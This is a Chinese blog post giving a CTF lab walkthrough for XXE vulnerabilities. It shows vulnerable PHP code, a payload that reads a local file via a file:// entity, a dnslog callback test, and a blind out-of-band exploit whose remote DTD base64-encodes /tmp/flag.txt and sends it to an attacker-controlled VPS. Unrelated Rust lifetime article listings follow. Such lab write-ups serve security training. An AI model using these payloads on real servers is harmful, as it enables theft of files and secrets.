CTF吧-渗透测试靶场-XXE篇

原创 已于 2024-11-07 08:47:43 修改 · 324 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全
于 2024-11-06 20:29:20 首次发布

 第一题

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///tmp/flag.txt">
]>
<demon>&xxe;</demon>

第二题

查看源码

<?php
header("content-type:text/html;charset=utf-8");
highlight_file(__FILE__);

libxml_disable_entity_loader(false);
//获取post请求的内容
$xmlfile = $_POST['xml'];
//创建一个节点,理论上默认代表跟节点
$dom = new DOMDocument();
// options 中配置代表允许加载外部实体
$dom->loadXML($xmlfile,LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo "<a href='http://www.hacker.wang/xxe/xxx.txt'>查看</a>";

?>

没有漏洞一中的输出 echo $xxe->login;也就是没有回显 

快速判断是否存在XXE漏洞,可以使用dnslog.cn判断:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "http://oe75pu.dnslog.cn">
]>
<demon><login>&xxe;</login></demon>

 

该题需要使用到vps,没有vps本地搭建再内网穿透也行。在公网服务器建立一个文件xxe.dtd,内容如下,我们来获取目标的/tmp/flag.txt的信息

xee.dtd文件内容:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///tmp/flag.txt">
<!ENTITY % a "<!ENTITY trick SYSTEM 'http://vps/xxe/xxe.php?xxx=%payload;'>">
%a;

payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE demon [<!ENTITY % remote SYSTEM "http://vps/xxe/xxe.dtd"> %remote;]>
<demon><xxx> &trick;</xxx> </demon>

在日志中找到flag 

 

详解Rust编程中的生命周期
这里是二进制空间安全博客,主要分享网络安全、信息安全和数据安全相关的技术文章。内容覆盖编程语言、基础知识、漏洞分析、攻防技巧、安全工具使用、最佳实践等安全技术主题。
11-24 1881
生命周期Rust编程中是一个重要概念, 它能确保引用像预期的那样一直有效。在Rust语言中, 每一个引用都有其生命周期, 通俗讲就是每个引用在程序执行的过程中都有其自身的作用域, 一旦离开其作用域, 其生命周期也宣告结束, 值不再有效。幸运的是, 在绝大多数时间里, 生命周期是隐含且可以进行推断的, 类似于当有多种可能的类型时必须注明类型, 正因为如此, 所以Rust需要使用者使用泛型生命周期参数来注明它们的关系, 从而确保程序运行时实际使用的引用绝对有效。
深入浅出Rust核心概念:生命周期
Da_zhenzai的博客
04-21 1972
Rust是一种快速、安全、并发的系统级编程语言,它的设计目标是提供一种高效、内存安全的编程方式。而生命周期(Lifetime)是Rust语言中的一个核心概念,它与内存管理、函数传参和引用操作等方面密切相关。LZ将详细介绍Rust生命周期的概念、语法和应用,帮助读者更好地理解和掌握Rust编程。生命周期Rust语言中用于描述变量、引用等对象在程序执行期间所占用的内存空间的概念。具体来说,它描述了某个引用所指向的对象的存活时间,即从对象创建开始到被销毁结束的时间段。在Rust中,生命周期由单引号(')表示。
Rust入门教程(七):生命周期
Cherry
10-05 3780
Rust 生命周期机制是与所有权机制同等重要的资源管理机制。生命周期,简而言之就是引用的有效作用域,之所以引入这个概念主要是应对复杂类型系统中资源管理的问题。引用是对待复杂类型时必不可少的机制,毕竟复杂类型的数据不能被处理器轻易地复制和计算,但引用往往导致极其复杂的资源管理问题。
rust学习之生命周期
2301_79967122的博客
12-08 1961
生命周期的主要作用是避免悬垂引用,它会导致程序引用了本不该引用的数据。当存在多个引用时,编译器有时会无法自动推导生命周期,此时就需要我们手动去标注,通过为参数标注合适的生命周期来帮助编译器进行借用检查的分析。生命周期标注并不会改变任何引用的实际作用域,自身并不具有什么意义,其作用只是告诉编译器多个引用之间的关系。即表示返回值的生命周期与参数生命周期中的较小值一致。开头,名称往往是一个单独的小写字母,大多数人都用。活得一样久,同时函数的返回引用也至少跟。,小于它应该具备的生命周期。的作用域的重合部分。
Rust生命周期,看这一篇就够了~
vince1998的博客
04-29 4381
生命周期的**主要作用**是**避免悬垂引用**,它会导致程序引用了本不该引用的数据
Rust基础 生命周期
zzzzzzelu的博客
10-16 647
文章目录生命周期阻止悬垂引用生命周期标注语法在函数签名中使用生命周期在结构体中使用生命周期在方法中使用生命周期简化函数/方法签名静态生命周期`'static` 生命周期Rust中,每个引用都有生命周期,在引用的生命周期内,它指向的对象必然是存在的。在大部分时候,编译器可以自动对引用的生命周期进行推断,保证引用是合法的,但在有些时候,编译器不能自动推断出引用的生命周期,这时就需要我们显式地设定引用的生命周期。 在Rust中,变量生命周期是指它被创建到被销毁的这个区间。要保证引用指向的对象存在,则引用的生
Rust生命周期推断:为什么函数返回值的生命周期不能超过任何一个输入引用的生命周期?(编译器无法在编译时知道哪个字符串更长,所以保守地选择了输入生命周期的交集,以确保安全)生命周期副作用、Rust局限
Dontla的博客
12-06 1376
Rust 中的生命周期旨在保证引用的有效性,防止悬垂引用。编译器通过生命周期注解和借用检查器在编译时进行验证。返回引用的函数必须确保返回的引用在所有可能的情况下都是有效的,这通常意味着返回值的生命周期不能超过任何一个输入引用的生命周期
Rust编程:从小白入坑】Rust生命周期(Lifetime)详解
最新发布
2501_92232234的博客
10-30 483
本文深入解析了Rust生命周期特性的原理和应用。首先通过悬垂引用问题阐明了生命周期的必要性,展示了Rust如何通过借用检查器防止内存安全问题。随后详细介绍了生命周期注解语法,包括函数签名中的生命周期参数声明、结构体字段的生命周期注解,以及方法实现中的生命周期处理。文章通过多个代码示例演示了生命周期在不同场景下的应用,如函数返回值、结构体定义和方法实现等。最后通过复杂示例展示了生命周期在真实项目中的使用方式,帮助开发者理解Rust如何通过生命周期确保引用的有效性。
Rust 生命周期符号使用的方法和规律
程序猿视角
03-10 1518
生命周期参数通常用于函数签名或结构体字段中,以指定引用的生命周期范围。在局部变量声明中,你通常不需要显式地指定生命周期参数,因为 Rust 的编译器会自动进行生命周期推断。但是,在某些复杂的情况下,你可能需要手动指定生命周期参数来确保引用的有效性。对于可变引用(mutable reference),你需要确保在引用有效的生命周期内,没有其他可变引用指向同一个数据。在大多数情况下,Rust编译器能够自动推断生命周期,但在某些复杂情况下,需要手动指定生命周期符号。等)用于指定引用的有效时间范围。
生命周期标注到底是什么?硬核Rust生命周期——看不懂这篇文章等于压根没学会生命周期
qq_54714089的博客
01-12 2764
结合具体又精炼的用例深入探讨生命周期,彻底搞清楚“生命周期是什么”的问题,扫清许多Rust开发者对生命周期的误区。
学霸带你游戏化深入理解 Rust 生命周期
纽雪澳诺加海美德的博客
12-11 1349
选择《血源诅咒》(Bloodborne)作为参考,因为它涉及复杂的游戏对象管理,帮助理解生命周期的重要性。生命周期Rust 中用来确保引用有效性的机制。input// 此函数接受一个字符串引用,并返回同一引用,确保有效性。避免不必要的生命周期标注,使用推断来简化代码。input// 利用编译器的推断功能简化代码。
rust 结构体与引用的生命周期
MengQing 's Blog
01-05 2249
rust结构体的总体内容以及引用的生命周期
Rust 生命周期
无生 的博客
02-21 2513
Rust 生命周期 首先每个引用都有生命周期,也就是引用保持有效的作用域 一个引用的作用域从声明的地方开始一直持续到最后一次使用为止 let a=String::from("a"); let b=&a;//b的诞生 ,后续没有在使用b,所以b死亡 在借用者生命期间,所有者必须是活的,不然就会产生悬垂引用,幸运的是我们不用关注它,交给编译器来提示,编译器通过生命周期来检查 大部分时候生命周期是隐含并可以推断的,但有些情况就无法推断了,需要程序员自己指出 fn longest(x: &
Rust生命周期
liuno0的博客
08-20 987
Rust生命周期Rust中一个非常难以理解的概念,也是Rust独有的概念。这篇文章将会继续上一篇文章继续讲述Rust中的生命周期的注意事项。如果还没有阅读上一章关于的请移步。
rust笔记11 生命周期&引用有效性
Erick Lv的笔记
08-27 1545
函数参数等的生命周期 rust保证内存安全的手段之一是没有悬空的引用(指针),而这个靠编译期间强制生命周期检查实现。先给出生命周期的声明方式: &i32 // i32的引用 &'a i32 // 带有显式声明周期的引用 &'a mut i32 // 带有显式生命周期的可变引用 考虑函数一个函数(该函数不会通过编译): f...
理解Rust:所有权,借用,生命周期
小Y的博客
09-23 4869
在本章中,您将学习: •“借用”和“生命周期”的概念 •哪些是关于借用的典型编程错误,即困扰系统软件 •Rust严格语法如何使用借用检查器来防止此类典型错误 •插入块的方式如何限制借用范围 •为什么函数返回引用需要生命周期指示符 •如何使用寿命指定符来表示函数及其含义 •借阅检查器的任务是什么 所有权和借款 我们已经看到,当你将变量“a”赋给变量“b”时,有两种情况:它们的类型是可复制的,也就是说...
Rust 编程视频教程(进阶)——004_2 函数和结构体中的生命周期
令狐一冲
01-13 405
视频地址 头条地址:https://www.ixigua.com/i6775861706447913485 B站地址:https://www.bilibili.com/video/av81202308/ 讲解内容 1、函数中的泛型生命周期 错误例子: fn longest(x: &str, y: &str) -> &str { if x.len() > y.l...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值